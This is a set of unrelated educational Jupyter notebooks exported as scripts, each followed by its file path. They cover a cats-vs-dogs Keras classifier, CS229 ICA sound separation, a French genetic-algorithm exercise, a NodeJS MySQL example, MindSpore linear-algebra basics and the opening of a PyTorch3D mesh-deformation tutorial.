results = sfiles.parseString('(iA)(rAB/pABCD)<1<2[<(iB)](mABC/D)[<(oD)](A/BC)1(cycB/C)2(oC)')

print('Components:', components)
print('Units:', units)
print()
fmt = '{0:>12s}:'
for u, s in graph.items():
    print(fmt.format(u), s)
# -
notebooks/05_SFILES_Directed_Graph.ipynb
# --- # jupyter: # jupytext: # text_representation: # extension: .py # format_name: light # format_version: '1.5' # jupytext_version: 1.14.4 # kernelspec: # display_name: Python 3 # name: python3 # --- # + [markdown] id="view-in-github" colab_type="text" # <a href="https://colab.research.google.com/github/ruoroj/Catsn-Dogs/blob/main/CandD.ipynb" target="_parent"><img src="https://colab.research.google.com/assets/colab-badge.svg" alt="Open In Colab"/></a> # + id="kuxm58tewDKu" pip install --upgrade jupyter_http_over_ws>=0.0.7 && \ jupyter serverextension enable --py jupyter_http_over_ws # + [markdown] id="fx6ICuz7OVca" # # 1. Defining the Question # + [markdown] id="yIEM3JyuOqny" # ### Understanding the Context # + [markdown] id="yayBVuEFO6aO" # The database is composed of several hundred images of cats and Dogs. Using these images we will train a amchine learning model to predict the difference between cats and dogs. # + [markdown] id="8lR1IYJWPD91" # ### Specifying the Question # + [markdown] id="Cf7rnqX2PF7E" # This dataset was first introduced to users in a Kaggle competition in 2013, whose goal was to write an algorithm to classify whether images contain either a dog or a cat. Since then, users have used the dataset for image recognition practice. # # + [markdown] id="nyrdtMHtPKWO" # ### Metrics for Success # + [markdown] id="XjGSWdwOPPW2" # The metric of success for this project is the model accuracy. The model accuracy shows how well a particular model predicts the dependent variable when tested after training it. The accuracy will be derived using the accuracy score. An accuracy that is low shows our model fails to accurately predict the dependent variable and the data may be underfit while an accuracy of 1 is not good either since the model is overfitted. In this project, my aim is to achieve an accuracy of at least 80%. 
# + [markdown] id="VxD8GEyIPUMQ" # ### The Experimental Design # + [markdown] id="17prGPGCPZSq" # The experimental design for this project is as follows: # # - Loading the libraries and dataset # - Data cleaning and preparation # - Performing EDA # - Making predictions using the different models that I've created # - Assesing the accuracy of the models created # - Making conclusions # + [markdown] id="yhy40BQ4Pqcs" # # 2. Reading the Data # + colab={"base_uri": "https://localhost:8080/"} id="p2J-51H3Ncne" outputId="8204fd28-015d-4f90-cab3-9804fb0473a2" # Importing the libraries import pandas as pd pd.options.display.float_format = "{:.2f}".format import numpy as np import os import matplotlib.pyplot as plt import matplotlib.image as mpimg import seaborn as sns from sklearn.model_selection import train_test_split from sklearn.metrics import r2_score from sklearn import metrics from sklearn.metrics import confusion_matrix,accuracy_score, classification_report from sklearn.preprocessing import StandardScaler import scipy as sp import tensorflow as tf import warnings import cv2 warnings.filterwarnings('ignore') from sklearn.preprocessing import LabelEncoder lb=LabelEncoder() from google.colab import drive drive.mount('/content/drive') from zipfile import ZipFile as zf import shutil import random from matplotlib import pyplot as plt # + id="HlCI3tLGOVGj" # Extracting data from G-Drive test_zip = zf('/content/drive/MyDrive/tempdf_storage/cand/test1.zip', 'r') test_zip.extractall('./tmp') test_zip.close() train_zip = zf('/content/drive/MyDrive/tempdf_storage/cand/train.zip', 'r') train_zip.extractall('./tmp') train_zip.close() # + [markdown] id="08xz1u1QzSmp" # # Perform EDA # + colab={"base_uri": "https://localhost:8080/", "height": 269} id="NZAU662kqjeW" outputId="506a748c-be31-403f-a0ab-d32133348d3a" # Checking if there is content in the train data train_data = '/content/tmp/train/' x = os.listdir(train_data) for img in os.listdir(train_data): img_array = 
cv2.imread(os.path.join(train_data, img)) plt.imshow(img_array) plt.show() break # + id="Q_I4kS9h9JpB" # Making a directory to store cata and dog pictures separately. images = './tmp/train' pet_images = './pet-images' cats = os.path.join(pet_images,'cat') dogs = os.path.join(pet_images,'dog') os.mkdir(pet_images) os.mkdir(cats) os.mkdir(dogs) # + id="Tjs6EoVqsm-2" # Spliting the cats and dog images into different folders for i in os.listdir(images): if i.split('.')[0] == 'cat': src = os.path.join(images,i) dst = os.path.join(cats,i) shutil.copyfile(src,dst) elif i.split('.')[0] == 'dog': src = os.path.join(images,i) dst = os.path.join(dogs,i) shutil.copyfile(src,dst) # + colab={"base_uri": "https://localhost:8080/", "height": 317} id="xcBoKtPl9o5p" outputId="c5627242-2236-4ff2-d06d-45ab92e5937e" # Check the number of images in each folder y = print(len(os.listdir(cats))) x = print(len(os.listdir(dogs))) sns.countplot(os.listdir(train)) # + [markdown] id="F0bBKLtFJUYl" # # Model Preprocessing. 
# + id="ZIMqrJWNsm7g"
# Splitting the images into training and validation sets:
# build the directory layout Keras' flow_from_directory expects
# (<base>/<split>/<class>/...).
base_dir = './dogs-vs-cats'
os.mkdir(base_dir)

train = os.path.join(base_dir,'training')
validation = os.path.join(base_dir,'validation')

train_cat = os.path.join(train,'cats')
train_dog = os.path.join(train,'dogs')

validation_cat = os.path.join(validation,'cats')
validation_dog = os.path.join(validation,'dogs')

# + id="MXc07QGJsm5J"
# Defining the test folder and populating it with data
test_images = './tmp/test1'
test = os.path.join(base_dir,'test')
test_folder = os.path.join(test,'test_folder')
os.mkdir(test)
os.mkdir(test_folder)
for i in os.listdir(test_images):
    src = os.path.join(test_images,i)
    dst = os.path.join(test_folder,i)
    shutil.copyfile(src,dst)

# + colab={"base_uri": "https://localhost:8080/"} id="rifLCsyOsm2d" outputId="89f385d9-a712-4ce7-b65c-e1c9cbff0a26"
# Check the length of the test folder
print(len(os.listdir(test_folder)))

# + id="oCcD0nFOypPb"
# Making the directories of the train and validation datasets.
os.mkdir(train)
os.mkdir(validation)
os.mkdir(train_cat)
os.mkdir(train_dog)
os.mkdir(validation_cat)
os.mkdir(validation_dog)

# + id="d9MxXanYOU6v"
# Defining a function for splitting the dataset into training/validation folders
def split_data(source, training, validation, split):
    """Shuffle the files in `source` and copy the first `split` fraction to
    `training`, the remainder to `validation`."""
    data = os.listdir(source)
    # random.sample with the full length returns a shuffled copy
    data = random.sample(data, len(data))
    for id, file in enumerate(data):
        if (os.path.getsize(source) != 0) and (id < len(data) * split):
            src = os.path.join(source, file)
            dst = os.path.join(training, file)
            shutil.copyfile(src, dst)
        elif (os.path.getsize(source) != 0) and (id >= len(data) * split):
            src = os.path.join(source, file)
            dst = os.path.join(validation, file)
            shutil.copyfile(src, dst)

# 80/20 train/validation split for each class
split = 0.8
split_data(cats, train_cat, validation_cat, split)
split_data(dogs, train_dog, validation_dog, split)

# + colab={"base_uri": "https://localhost:8080/"} id="d3EKuVI-4MNU" outputId="a127f875-726b-4e2f-c7a6-aca9e92ea346"
# Check the length of the different splits
print(len(os.listdir(train_cat)))
print(len(os.listdir(train_dog)))
print(len(os.listdir(validation_cat)))
print(len(os.listdir(validation_dog)))

# + [markdown] id="Q2rgnTM2Aodd"
# ## Tensorflow Modelling

# + id="JzrryVQiz2uw"
# Importing libraries needed for Tensorflow modelling.
# NOTE(review): both `keras` and `tensorflow.keras` are imported here; mixing the
# two package namespaces is a known source of incompatibilities — consider
# standardizing on tensorflow.keras.
from keras import models
from keras import layers
from keras import optimizers
from keras.preprocessing.image import load_img, img_to_array, ImageDataGenerator
# target image size used by the model's input layer
WIDTH = 150
HEIGHT = 150
import tensorflow as tf
from tensorflow.keras.datasets import cifar10
from tensorflow.keras.preprocessing.image import ImageDataGenerator
from tensorflow.keras.models import Sequential
from tensorflow.keras.layers import Dense, Dropout, Activation, Flatten
from tensorflow.keras.layers import Conv2D, MaxPooling2D

# + colab={"base_uri": "https://localhost:8080/"} id="4p9_ZY7B0YDR" outputId="5613fb5b-d551-4df1-b333-f229d0cc8736"
# Defining the convolution layers: three Conv/Conv/MaxPool stages followed by a
# dense head with a single sigmoid output (binary cat-vs-dog classification).
model=models.Sequential()
model.add(layers.Conv2D(32, (3,3), activation="relu", input_shape=(WIDTH, HEIGHT, 3)))
model.add(layers.Conv2D(32, (3,3), activation="relu"))
model.add(layers.MaxPooling2D((2,2)))
model.add(layers.Conv2D(128, (3,3), activation="relu"))
model.add(layers.Conv2D(128, (3,3), activation="relu"))
model.add(layers.MaxPooling2D((2,2)))
model.add(layers.Conv2D(64, (3,3), activation="relu"))
model.add(layers.Conv2D(64, (3,3), activation="relu"))
model.add(layers.MaxPooling2D((2,2)))
model.add(layers.Flatten())
model.add(layers.Dense(512, activation="relu"))
model.add(layers.Dense(1, activation="sigmoid"))
model.summary()

# + colab={"base_uri": "https://localhost:8080/"} id="_YULTesk1ym_" outputId="885b1b0c-9c06-4e36-919c-648b2f6a9278"
# Compiling the model.
# NOTE: metrics=["binary_accuracy"] means the training history keys are
# 'binary_accuracy' / 'val_binary_accuracy', not 'acc' / 'val_acc'.
model.compile(loss="binary_crossentropy",
              optimizer=optimizers.RMSprop(learning_rate=1e-4),
              metrics=["binary_accuracy"])
print(" Model compiled.")

# + id="0C2fL3Nb17Mf"
# Generating tensor images: augmentation for training, rescale-only for validation
datagen = ImageDataGenerator(rescale=1./255,
                             #featurewise_center=True,
                             #featurewise_std_normalization=True,
                             rotation_range=40,
                             width_shift_range=0.2,
                             height_shift_range=0.2,
                             shear_range=0.2,
                             zoom_range=0.2,
                             horizontal_flip=True,
                             vertical_flip=True,
                             fill_mode='nearest'
                             )
valid_datagen = ImageDataGenerator(rescale=1./255)

# + colab={"base_uri": "https://localhost:8080/"} id="0bmhNRWd17JR" outputId="48e1f818-f551-4a41-db51-48c2a760e56a"
# Defining the model's parameters: directory iterators feeding 150x150 batches
train_generator = datagen.flow_from_directory('/content/dogs-vs-cats/training',
                                              target_size=(150,150),
                                              batch_size=64,
                                              class_mode='binary'
                                              )
validation_generator = valid_datagen.flow_from_directory('/content/dogs-vs-cats/validation',
                                                         target_size=(150,150),
                                                         batch_size=64,
                                                         class_mode='binary'
                                                         )

# + colab={"base_uri": "https://localhost:8080/"} id="vOJJkCB7Ad_G" outputId="3dfb1e6f-9c69-4fb9-b14c-3283a354ea59"
# Running the 20 epochs
history = model.fit(train_generator,
                    steps_per_epoch=50,
                    epochs=20,
                    validation_data=validation_generator,
                    validation_steps=20,
                    )

# + [markdown] id="TNxtZWEhBZiw"
# The accuracy of the model is about 80.16%.
This is good as we have achieved out metric of success. # # # # + [markdown] id="U7X2t_IvIbTY" # # Metrics # + [markdown] id="Klq68wWjIdtU" # Let us visualize the metrics of the model as it performed in the different epochs. # + id="XF0bkNqFAd1Q" colab={"base_uri": "https://localhost:8080/", "height": 562} outputId="57d0a0c6-17e6-40c7-a711-f1a08710f9fe" # Getting the metrics and visualizing their performance for differet epochs acc = history.history['acc'] val_acc = history.history['val_acc'] loss = history.history['loss'] val_loss = history.history['val_loss'] epoch = range(len(acc)) plt.title('Accuracy vs Validation-Accuracy') plt.plot(epoch,acc,label='Accuracy') plt.plot(epoch,val_acc,label='Validation-Accuracy') plt.legend() plt.figure() plt.title('Loss vs Validation-Loss') plt.plot(epoch,loss,label='Loss') plt.plot(epoch,val_loss,label='Validation-Loss') plt.legend() # + [markdown] id="5asi5t_GIqHT" # # Conclusion # + [markdown] id="2envyMYpItoq" # The model has an accuracy score of 80%. Hence, the project can be considered successfull. The metrics for success included performing EDA and getting an accuracy score of above 80%.
CandD.ipynb
# --- # jupyter: # jupytext: # text_representation: # extension: .py # format_name: light # format_version: '1.5' # jupytext_version: 1.14.4 # kernelspec: # display_name: Python 3 # language: python # name: python3 # --- # # ICA on sound tracks # <NAME> (<EMAIL>) 26th April 2018 # # Source: CS229: PS4Q4 # # Starting code: http://cs229.stanford.edu/ps/ps4/q4/ import sounddevice as sd import numpy as np import matplotlib.pyplot as plt # %matplotlib inline Fs = 11025 # + def normalize(dat): return 0.99 * dat / np.max(np.abs(dat)) def load_data(): mix = np.loadtxt('cs229_Data/mix.dat') return mix def play(vec): sd.play(vec, Fs, blocking=True) # - def unmixer(X): M, N = X.shape # W = np.random.rand(N,N) W = np.eye(N) anneal = [0.1, 0.1, 0.1, 0.05, 0.05, 0.05, 0.02, 0.02, 0.01, 0.01, 0.005, 0.005, 0.002, 0.002, 0.001, 0.001] print('Separating tracks ...') sigmoid = lambda x: 1 / (1 + np.exp(-x)) tol = [] ######## Your code here ########## for alpha in anneal: print('working on alpha = {0}'.format(alpha)) for xi in X: p1 = np.outer(1 - 2 * sigmoid(np.dot(W, xi.T)), xi) p2 = np.linalg.inv(W.T) W += alpha * (p1 + p2) # Vectorisation not working :( # gradient = (1 - 2*sigmoid(np.dot(W,X.T))).dot(X)/M + np.linalg.inv(W.T) # W = W + alpha*gradient # tol.append(np.linalg.norm(W_old - W)) # plt.plot(tol) ################################### return W def unmix(X, W): S = np.zeros(X.shape) ######### Your code here ########## S = np.dot(W, X.T) ################################## return S.T # + X = normalize(load_data()) for i in range(X.shape[1]): print('Playing mixed track %d' % i) play(X[:, i]) # - W = unmixer(X) W # + S = normalize(unmix(X, W)) for i in range(S.shape[1]): print('Playing separated track %d' % i) play(S[:, i]) # - # p1 = np.outer(1 - 2 * sigmoid(np.dot(W, xi.T)), xi) sigmoid = lambda x: 1 / (1 + np.exp(-x)) m = 1-2*sigmoid(np.dot(W, xi.T)) m2 = np.dot(m.reshape([-1,1]), xi.reshape([1,-1])) np.shape(xi)
CS229_PS/.ipynb_checkpoints/PS4_Q4_ICA-checkpoint.ipynb
# --- # jupyter: # jupytext: # text_representation: # extension: .py # format_name: light # format_version: '1.5' # jupytext_version: 1.14.4 # kernelspec: # display_name: Python 3 # language: python # name: python3 # --- # # Algorithmes génétiques # # Vous souhaitez partir dans l'espace et trouvez un manuel un peu étrange. Ce manuel contient un message en 32 caractères qui n'est plus lisible. Le manuel vous fournit en revanche une fonction Python (!) qui, à partir d'un message passé en paramètre (chaîne de caractère) renvoit le nombre de caractères correctement placés par rapport au message d'origine. from stochastic.data import score score("Hi guys!") # Bon, c'est déjà ça... # La fonction fournie permet de faire des tests avec une autre solution, ce qui va nous permettre de mettre au point un algorithme de résolution. score("plop", solution="ploc") # Nous allons mettre au point un algorithme de résolution de type « algorithmes génétiques » pour résoudre le décodage du message "Hello world!". score_hello = lambda x: score(x, solution="Hello world!") score_hello("Hello world!") # Tout d'abord, considérons l'ensemble des caractères qui forment notre mot. On a le droit: # - aux vingt-six lettres de l'alphabet minuscules; (message en anglais, sans accent!) # - aux mêmes lettres en majuscules; # - à la ponctuation. # + import string letters = string.ascii_uppercase + string.ascii_lowercase + string.punctuation + ' ' letters # - # Puisqu'on travaille avec un problème plus petit, on stocke cette taille: length = score_hello("Hello world!") length # La bibliothèque `random` nous sera utile pour cette séance. 
Elle propose notamment la fonction `choice`: # + import random random.choice(letters) # - # On peut également tirer plusieurs lettres (différentes) avec la fonction `sample`: random.sample(letters, 3) # Notons également les deux fonctions suivantes pour transformer une chaîne de caractère en liste, et inversement: list("toto") "".join([random.choice(letters) for _ in range(12)]) # Estimons le temps d'évaluation de la fonction `score_hello`: # %%timeit score_hello("Hello,World~") # <div class="alert alert-warning"> # **Question : ** Estimer le temps d'évaluation au pire des cas (bruteforce) de tous les messages à 12 (puis à 32) caractères possibles. # </div> 1.7e-6 * len(letters)**12 # en nombre d'années (âge de l'univers: 1.38e10) "12 letters: {:.3g} yr; 32 letters: {:.3g} yr".format( 1.7e-6 * len(letters)**12 / 365 / 24 / 60 / 60, 1.7e-6 * len(letters)**32 / 365 / 24 / 60 / 60) # ## Algorithmes # # <div class="alert alert-warning"> # **Théorie !** # </div> # # Voir les slides... # # <div class="alert alert-warning"> # **En pratique...** # </div> # # Toute la difficulté dans l'utilisation des algorithmes génétiques revient à correctement choisir un relativement grand nombre de paramètres: # # - comment choisir une taille de la population de départ ; # - comment initialiser la population de départ ; # - comment procéder aux croisements : # - comment choisir deux éléments à croiser (*la sélection*); # - comment croiser les éléments ; # - comment procéder aux mutations : # - quel taux de mutation choisir ; # - comment muter un élément ; # - comment arrêter la recherche : # - on peut fixer un nombre d'itérations maximal ; # - comment s'assurer qu'on conserve toujours la meilleure instance (*l'élitisme*) ; # - comment optimiser la convergence : # - la distribution (détails en annexe pour les personnes motivées/intéressées/en avance). 
# # <div class="alert alert-success"> # **Objectifs de la séance :** La suite de l'exercice consiste à coder des algorithmes génétiques en utilisant votre inspiration pour essayer différents opérateurs de sélection, de croisement et de mutation. # </div> # # Quelques remarques : # 1. **Nous sommes là pour vous guider**, pour vous suggérer des pistes d'amélioration, mais aussi pour vous laisser faire vos erreurs/comprendre par vous-même pourquoi une méthode n'est pas forcément pertinente; # 1. En paramétrant des méthodes stochastiques, on traverse en général une longue phase de « ça ne fonctionne pas » avant d'arriver aux bons paramètres qui permettent de résoudre le problème de manière efficace à tous les coups; # 1. Essayez de **garder une interface générique** pour vos fonctions afin de pouvoir facilement remplacer les opérateurs que vous testerez. # # <div class="alert alert-warning"> # **C'est à vous !** # </div> # + # Selection # Une seule méthode suffit ; le plus simple à expliquer est `tournament`. 
import bisect import itertools def tournament(samples, elite_size): for _ in samples[elite_size:]: yield max(random.sample(samples, 2)) def roulette(samples, elite_size): cumul_scores = list( itertools.accumulate(score for score, _ in samples)) total = cumul_scores[-1] for _ in samples[elite_size:]: yield samples[bisect.bisect(cumul_scores, random.uniform(0, total))] # + # Mask # Il faudrait présenter `two_point_crossover` (le classique) mais pour nous, # c'est finalement `uniform_point_crossover` qui fonctionne le mieux import itertools def one_point_crossover(length): point = random.randint(0, length) yield from itertools.repeat(True, point) yield from itertools.repeat(False, length - point) def two_point_crossover(length): point1, point2 = sorted(random.randint(0, length) for _ in range(2)) yield from itertools.repeat(True, point1) yield from itertools.repeat(False, point2 - point1) yield from itertools.repeat(True, length - point2) def uniform_point_crossover(length): return (random.choice((False, True)) for i in range(length)) # + # Combine # Une seule solution a priori, c'est `mask` qui fait tout le boulot) def combine(c1, c2, mask): for i1, i2, m in zip(c1[1], c2[1], mask): if m: yield i1, i2 else: yield i2, i1 # + # Mutate # Attention à mettre la proba de 5% sur une lettre et pas sur un mot pour avoir assez d'entropie def mutate(x): for i, _ in enumerate(x): if random.random() < .05: i = random.randint(0, 11) x[i] = random.choice(letters) return "".join(x) # + # New generation (unique solution) def pairwise(iterable): """Trick to get [(a, b), (c, d), ...] 
from [a, b, c, d, ...]""" x = iter(iterable) return zip(x, x) def new_generation(samples, length, mask, selection, elite_size): for x, y in pairwise(selection(samples, elite_size)): for t in zip(*combine(x, y, mask(length))): yield mutate(list(t)) # - def run(score, length, population=150, elite_size=2, mask=uniform_point_crossover, selection=tournament, iterations=200): # Initial population population = ["".join(random.choice(letters) for _ in range(length)) for i in range(population)] for i in range(iterations): # Evaluate a population scored_population = sorted(((score(i), i) for i in population), reverse=True) max_, best = scored_population[0] # Start a new generation with the elite population = [x[1] for x in scored_population[:elite_size]] if max_ == length: print() print("Found '{}' in {} iterations.".format(best, i)) break if i % 5 == 0: print("{} → {}".format(best, max_)) # Then add the crossover/mutation population += list(new_generation(scored_population, length, mask, selection, elite_size)) run(score_hello, 12) # <div class="alert alert-success"> # **Résolution :** Essayons maintenant avec la fonction reçue par notre ami ! # </div> # # Il faudra sans doute rejouer avec différents paramètres de l'algorithme pour trouver une solution... # # Dans le pire des cas, il faut garder à l'esprit la philosophie des méthodes stochastiques, à savoir « Mieux vaut une solution pas trop mauvaise que pas de solution ». # + # Il faut vraiment booster la population pour trouver la solution! # Sinon, il faudra faire le malin avec la méthode en annexe run(score, 32, population=700) # - # ## Annexe : calcul distribué, fonctionnement par îlots. # # Une manière de distribuer les calculs quand on est : # - un peu limite en ressource ; # - coincé dans des minima locaux ; # # consiste à lancer plusieurs exécutions du même algorithme en parallèle. Cette méthode permet également d'**avoir un comportement plus stable d'une exécution à l'autre**. 
# # Chaque algorithme va alors converger vers différents minima locaux. Le principe des îlots consiste alors à faire voyager les meilleurs éléments de chaque îlot vers les îlots voisins afin qu'ils se croisent avec d'autres populations. Il faut alors trouver un rythme de *voyage* qui permette à chaque îlot de développer des spécificités tout en brassant suffisamment souvent pour aider à la convergence. # # Nous vous proposons alors le code suivant à base de threads (module `concurrent.futures`) et avec des queues (thread-safe!) pour communiquer. Les particularités du langage Python (rechercher "Global Interpreter Lock" (GIL) pour plus de détails...) ne permettent pas de procéder à un vrai multithreading donc la méthode serait à vrai dire plus efficace dans un autre langage de programmation. def run_islands(idx, length=32, population=400, elite_size=2, mask=uniform_point_crossover, selection=tournament, iterations=200): # Initial population population = ["".join(random.choice(letters) for _ in range(length)) for i in range(population)] for i in range(iterations): # Evaluation a population scored_population = sorted(((score(i), i) for i in population), reverse=True) max_, best = scored_population[0] # Start a new generation with the elite population = [x[1] for x in scored_population[:elite_size]] if max_ == length: return (best, i) if i % 5 == 0: # astuce du \n pour éviter deux threads qui écrivent sur la même ligne print("Island {} : {} → {}\n".format(idx, best, max_), end="", flush=True) # Pass to next island queues[(idx + 1) % n_islands].put(population) try: # Get from previous island population += queues[idx].get(block=True, timeout=5) queues[idx].task_done() except queue.Empty: return (None, i) # Then add the crossover/mutation population += list(new_generation(scored_population, length, mask, selection, 2*elite_size)) return (None, i) # + from concurrent import futures import queue n_islands = 3 # Attention à bien recréer des queues de communications vides ! 
queues = [queue.Queue() for _ in range(n_islands)] executor = futures.ThreadPoolExecutor(max_workers = n_islands) results = executor.map(run_islands, range(n_islands)) best = None total_it = 0 for i, r in enumerate(results): best_i, it = r if best_i is not None: best = best_i print("Found '{}' in {} iterations on island {}".format(best_i, it, i)) total_it += it # -
notebooks/solutions/02-genetic_algorithms.ipynb
// --- // jupyter: // jupytext: // text_representation: // extension: .js // format_name: light // format_version: '1.5' // jupytext_version: 1.14.4 // kernelspec: // display_name: NodeJS // language: javascript // name: nodejs // --- // #MySQL var mysql = require('mysql'); var connection = mysql.createConnection({ host : 'localhost', user : 'tester', password : '<PASSWORD>', }); connection.connect(function(err) { // connected! (unless `err` is set) if (err) throw err; console.log('connected as id ' + connection.threadId); }); // Let's insert some data var post ={first_name:'Wolfgang', last_name:'Goethe', year_of_death:'1832-01-01 00:00'} var query = connection.query('INSERT INTO `test_db`.`writer` SET ?', post, function(err, result) { if (err) throw err; console.log(result.insertId); }); console.log(query.sql) // Let's query for some data, prepared statement // + var sql = "SELECT * FROM ?? WHERE ?? > ?"; var inserts = ['test_db.writer', 'year_of_death', '1500']; sql = mysql.format(sql, inserts); var query = connection.query(sql, function(err, results) { if (err) throw err; for (var i = 0; i < results.length; i++) { console.log('Writer: ', results[i].first_name , results[i].last_name, "Year of Death: ", results[i].year_of_death); } }); // -
examples_database/test_database_NodeJS.ipynb
# --- # jupyter: # jupytext: # text_representation: # extension: .py # format_name: light # format_version: '1.5' # jupytext_version: 1.14.4 # kernelspec: # display_name: Python 3 (ipykernel) # language: python # name: python3 # --- # + [markdown] slideshow={"slide_type": "-"} # # 线性代数 # # 标量由只有一个元素的张量表示 # + origin_pos=2 tab=["pytorch"] import mindspore import mindspore.numpy as mnp x = mindspore.Tensor(3.0, dtype=mindspore.float32) y = mindspore.Tensor(2.0, dtype=mindspore.float32) x + y, x * y, x / y, x**y # + [markdown] slideshow={"slide_type": "slide"} # 你可以将向量视为标量值组成的列表 # + origin_pos=6 tab=["pytorch"] x = mnp.arange(4) x # + [markdown] slideshow={"slide_type": "-"} # 通过张量的索引来访问任一元素 # + origin_pos=10 tab=["pytorch"] x[3] # + [markdown] slideshow={"slide_type": "slide"} # 访问张量的长度 # + origin_pos=14 tab=["pytorch"] len(x) # + [markdown] slideshow={"slide_type": "-"} # 只有一个轴的张量,形状只有一个元素 # + origin_pos=18 tab=["pytorch"] x.shape # + [markdown] slideshow={"slide_type": "slide"} # 通过指定两个分量$m$和$n$来创建一个形状为$m \times n$的矩阵 # + origin_pos=22 tab=["pytorch"] A = mnp.arange(20).reshape(5, 4) A # + [markdown] slideshow={"slide_type": "-"} # 矩阵的转置 # + origin_pos=26 tab=["pytorch"] A.T # + [markdown] slideshow={"slide_type": "slide"} # *对称矩阵*(symmetric matrix)$\mathbf{A}$等于其转置:$\mathbf{A} = \mathbf{A}^\top$ # + origin_pos=30 tab=["pytorch"] B = mindspore.Tensor([[1, 2, 3], [2, 0, 4], [3, 4, 5]], dtype=mindspore.int32) B # + origin_pos=34 tab=["pytorch"] B == B.T # + [markdown] slideshow={"slide_type": "slide"} # 就像向量是标量的推广,矩阵是向量的推广一样,我们可以构建具有更多轴的数据结构 # + origin_pos=38 tab=["pytorch"] X = mnp.arange(24).reshape(2, 3, 4) X # + [markdown] slideshow={"slide_type": "slide"} # 给定具有相同形状的任意两个张量,任何按元素二元运算的结果都将是相同形状的张量 # + origin_pos=42 tab=["pytorch"] A = mnp.arange(20, dtype=mindspore.float32).reshape(5, 4) B = A.copy() A, A + B # + [markdown] slideshow={"slide_type": "slide"} # 两个矩阵的按元素乘法称为*Hadamard积*(Hadamard product)(数学符号$\odot$) # + origin_pos=46 tab=["pytorch"] A * B # + 
origin_pos=50 tab=["pytorch"] a = 2 X = mnp.arange(24).reshape(2, 3, 4) a + X, (a * X).shape # + [markdown] slideshow={"slide_type": "slide"} # 计算其元素的和 # + origin_pos=54 tab=["pytorch"] x = mnp.arange(4, dtype=mindspore.float32) x, x.sum() # + [markdown] slideshow={"slide_type": "-"} # 表示任意形状张量的元素和 # + origin_pos=58 tab=["pytorch"] A.shape, A.sum() # + [markdown] slideshow={"slide_type": "slide"} # 指定张量沿哪一个轴来通过求和降低维度 # + origin_pos=62 tab=["pytorch"] A_sum_axis0 = A.sum(axis=0) A_sum_axis0, A_sum_axis0.shape # + origin_pos=66 tab=["pytorch"] A_sum_axis1 = A.sum(axis=1) A_sum_axis1, A_sum_axis1.shape # + origin_pos=70 tab=["pytorch"] A.sum(axis=(0, 1)) # + [markdown] slideshow={"slide_type": "slide"} # 一个与求和相关的量是*平均值*(mean或average) # + origin_pos=74 tab=["pytorch"] A.mean(), A.sum() / A.size # + origin_pos=78 tab=["pytorch"] A.mean(axis=0), A.sum(axis=0) / A.shape[0] # + [markdown] slideshow={"slide_type": "slide"} # 计算总和或均值时保持轴数不变 # + origin_pos=82 tab=["pytorch"] sum_A = A.sum(axis=1, keepdims=True) sum_A # + [markdown] slideshow={"slide_type": "-"} # 通过广播将`A`除以`sum_A` # + origin_pos=86 tab=["pytorch"] A / sum_A # + [markdown] slideshow={"slide_type": "slide"} # 某个轴计算`A`元素的累积总和 # + origin_pos=90 tab=["pytorch"] A.cumsum(axis=0) # + [markdown] slideshow={"slide_type": "slide"} # 点积是相同位置的按元素乘积的和 # + origin_pos=94 tab=["pytorch"] y = mnp.ones(4, dtype = mindspore.float32) x, y, mnp.dot(x, y) # + [markdown] slideshow={"slide_type": "-"} # 我们可以通过执行按元素乘法,然后进行求和来表示两个向量的点积 # + origin_pos=98 tab=["pytorch"] mnp.sum(x * y) # + [markdown] slideshow={"slide_type": "slide"} # 矩阵向量积$\mathbf{A}\mathbf{x}$是一个长度为$m$的列向量, # 其第$i$个元素是点积$\mathbf{a}^\top_i \mathbf{x}$ # + origin_pos=105 tab=["pytorch"] A.shape, x.shape, mnp.dot(A, x) # + [markdown] slideshow={"slide_type": "slide"} # 我们可以将矩阵-矩阵乘法$\mathbf{AB}$看作是简单地执行$m$次矩阵-向量积,并将结果拼接在一起,形成一个$n \times m$矩阵 # + origin_pos=109 tab=["pytorch"] B = mnp.ones((4, 3)) mnp.matmul(A, B) # + [markdown] slideshow={"slide_type": "slide"} # 
$L_2$*范数*是向量元素平方和的平方根: # $$\|\mathbf{x}\|_2 = \sqrt{\sum_{i=1}^n x_i^2}$$ # + origin_pos=113 tab=["pytorch"] u = mindspore.Tensor([3.0, -4.0], dtype=mindspore.float32) mnp.norm(u) # + [markdown] slideshow={"slide_type": "slide"} # $L_1$范数,它表示为向量元素的绝对值之和: # $$\|\mathbf{x}\|_1 = \sum_{i=1}^n \left|x_i \right|$$ # + origin_pos=117 tab=["pytorch"] mnp.abs(u).sum() # + [markdown] slideshow={"slide_type": "slide"} # 矩阵 # 的*Frobenius范数*(Frobenius norm)是矩阵元素平方和的平方根: # $$\|\mathbf{X}\|_F = \sqrt{\sum_{i=1}^m \sum_{j=1}^n x_{ij}^2}$$ # + origin_pos=121 tab=["pytorch"] mnp.norm(mnp.ones((4, 9)))
chapter_02_preliminaries/2_linear-algebra.ipynb
# --- # jupyter: # jupytext: # text_representation: # extension: .py # format_name: light # format_version: '1.5' # jupytext_version: 1.14.4 # kernelspec: # display_name: Python 3 # language: python # name: python3 # --- # + colab={} colab_type="code" id="nF07sDgJWHQy" # Copyright (c) Facebook, Inc. and its affiliates. All rights reserved. # + [markdown] colab_type="text" id="BRcOouCyWHQ2" # # Deform a source mesh to form a target mesh using 3D loss functions # + [markdown] colab_type="text" id="HfwwW9HqtuvQ" # In this tutorial, we learn to deform an initial generic shape (e.g. sphere) to fit a target shape. # # We will cover: # # - How to **load a mesh** from an `.obj` file # - How to use the PyTorch3D **Meshes** datastructure # - How to use 4 different PyTorch3D **mesh loss functions** # - How to set up an **optimization loop** # # # Starting from a sphere mesh, we learn the offset to each vertex in the mesh such that # the predicted mesh is closer to the target mesh at each optimization step. To achieve this we minimize: # # # + `chamfer_distance`, the distance between the predicted (deformed) and target mesh, defined as the chamfer distance between the set of pointclouds resulting from **differentiably sampling points** from their surfaces. # # However, solely minimizing the chamfer distance between the predicted and the target mesh will lead to a non-smooth shape (verify this by setting `w_chamfer=1.0` and all other weights to `0.0`). # # We enforce smoothness by adding **shape regularizers** to the objective. Namely, we add: # # # + `mesh_edge_length`, which minimizes the length of the edges in the predicted mesh. # # + `mesh_normal_consistency`, which enforces consistency across the normals of neighboring faces. # # + `mesh_laplacian_smoothing`, which is the laplacian regularizer. # + [markdown] colab_type="text" id="P-h1ji4dWHQ5" # ## 0. 
